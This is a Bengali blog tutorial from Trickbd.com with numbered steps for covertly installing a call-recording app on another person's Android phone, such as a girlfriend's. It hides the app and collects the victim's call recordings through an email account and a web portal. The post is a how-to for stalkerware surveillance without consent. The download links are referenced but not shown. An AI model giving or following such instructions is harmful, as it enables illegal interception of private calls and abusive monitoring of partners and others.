Site icon Trickbd.com

আসুন অন্যের ফোন হ্যাক করে তার ভয়েস কল রেকোর্ড নিজের মোবাইলে শুনি।আপনার গার্লফ্রেন্ডের কল রেকর্ড ও শুনুন। কি বিশ্বাস হচ্ছে না??তাইলে টিউনটি একবার দেখুন।

Unnamed

আসসালামু আলাইকুম।
প্রিয় বন্ধুরা, আপনারা সবাই কেমন আছেন, আশা করি খুব ভাল আছেন এবং আগামি তে যেন সব সময় ভালো থাকেন Trickbd এর পহ্ম থেকে এই কামনা রইলো।

এবার Trickbd কে Facebook এ Like দিয়ে নিন।
Trickbd Is On Facebook

আসুন অন্যর এন্ড্রয়েট ফোন হ্যাক করে তার কল রিকোর্ড শুনি নিজের মোবাইলে।

কি অবাক হচ্ছেন তো?? আরে ভাই অবাক হওয়ার কিছুই নাই। বর্তমান সময়ে প্রযুক্তি আমাদের হাতে এন্ড্রয়েট ফোন দিয়েছে।আর এই এন্ড্রয়েট ফোন দিয়ে এখন অনেক কিছুই সম্ভব।যা আমরা কখনোই কল্পনা করিনি।

টাইটেল টা দেখে অনেকে মনে মনে ধরেই নিয়েছেন যাক এইবার অন্তত গার্ল ফ্রেন্ডের দিন শেষ।আমার দিন শুরু।

আমি তাদের কে বলি।ভাই সত্যিকারের ভালবেসে থাকলে এই কাজটা অন্তত করতে যাইয়েন না।এইটা করলে রিলেশনে যে ফাটল ধরবে তা আমি সিউর (প্রমাণিত)।(এইখানে একটা দুক্কের ইমু হপে)

তো যাইহোক কাজের কথাই আসি।

এই অ্যাপ কিভাবে কাজ করে।।

এইটা এমন একটা অ্যাপ যা প্রথমে ভিক্টিমের ফোনে ইন্সটল করে দিতে হবে।আর ভিক্টিম টা এমন হতে হবে যে

নেট ইউজ করে।কারন নেট ছাড়া হ্যাকিং পুরাই ইম্পসিবল।

১। প্রথমে নিচের লিংক থেকে অ্যাপটি ডাউনলোড করুন।

২।অ্যাপে ঢুকুন।এক্সেপ্ট দিয়ে ৩ টা বক্স দেখতে পাবেন।

৩।যে ইমেল দিয়ে রেজিস্টার করবেন সেইটা দিন।তারপর পাসওয়ার্ড দিন। দুইটা বক্সে একই পাসওয়ার্ড দিবেন।

৪।সেটিং থেকে Hide app করে দিন। এবং বের হয়ে আসুন।

এখন ওই ফোনে অ্যাপসটি আর খুজে পাওয়া যাবে না।ওই ফোন দিয়ে যতো রিকোর্ড হবে সব ইমেলে আপলোড হবে নেট কানেক্ট দেয়ার সাথে সাথে।

৫। এই লিংকে ঢুকুন।

৬।ইমেল আর পাসওয়ার্ড দেয়ার যায়গায় অ্যাপে দেয়া ইমেল আর পাসওয়ার্ড দিয়ে লগিন করুন।

৭।তারপর Get Records এ ক্লিক করুন।এবং অপেক্ষা করুন ৫/১০ মিনিট।

৮।তারপর ইমেলে থাকা রিকোর্ডগুলো ওখানে আপলোড হবে এবং আপনি ইচ্ছা করলে সেখান থেকে শুনতে বা ডাউনলোড করতে পারবে রেকোর্ড গুলো।

বুঝতে সমস্যা হলে নিচে স্ক্রিন সর্ট দেয়া আছে। আর আপনাদের সুবিধার্তে ভিডিও টিউটোরিয়াল ও দেয়া আছে দেখতে পারেন।

অ্যাপসটি ভয়েস রিকোর্ডে অনেক কম MB খরচ করে।

-:ভিডিও লিংক:-

ডাউনলোডের জন্য ফোনের ডিফল্ট ব্রাউজার বা Uc ব্রাউজার ব্যবহার করবেন।ক্লিক Create Download link।অন্য কোন পেজে গেলে ব্যাক করে আগের পেজে এসে Create Download link ক্লিক করুন।

অ্যাপ ডাউনলোড লিংক

ভাল থাকুন,সুস্থ থাকুন আর সবসময় প্রযুক্তি তথা Trickbd এর সাথেই থাকুন।